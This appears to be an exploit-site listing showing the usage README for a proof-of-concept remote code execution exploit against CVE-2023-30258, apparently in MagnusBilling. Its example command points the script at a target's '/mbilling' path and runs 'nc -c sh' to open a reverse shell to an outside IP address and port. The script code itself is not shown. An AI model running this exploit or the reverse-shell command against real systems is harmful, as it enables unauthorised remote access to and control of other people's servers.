## https://sploitus.com/exploit?id=6B96A3B1-82E9-561C-8CAE-E4B4719FD49D
# CVE-2023-30258-RCE-POC
POC for CVE-2023-30258-RCE by n0o0b
## Usage
```
usage: poc.py [-h] [-u URL] [-c CMD]
example. python poc.py -u http://10.10.69.34/mbilling --cmd "nc -c sh 10.21.126.163 8888"
options:
-h, --help show this help message and exit
-u URL, --url URL Target URL
-c CMD, --cmd CMD Command to execute
```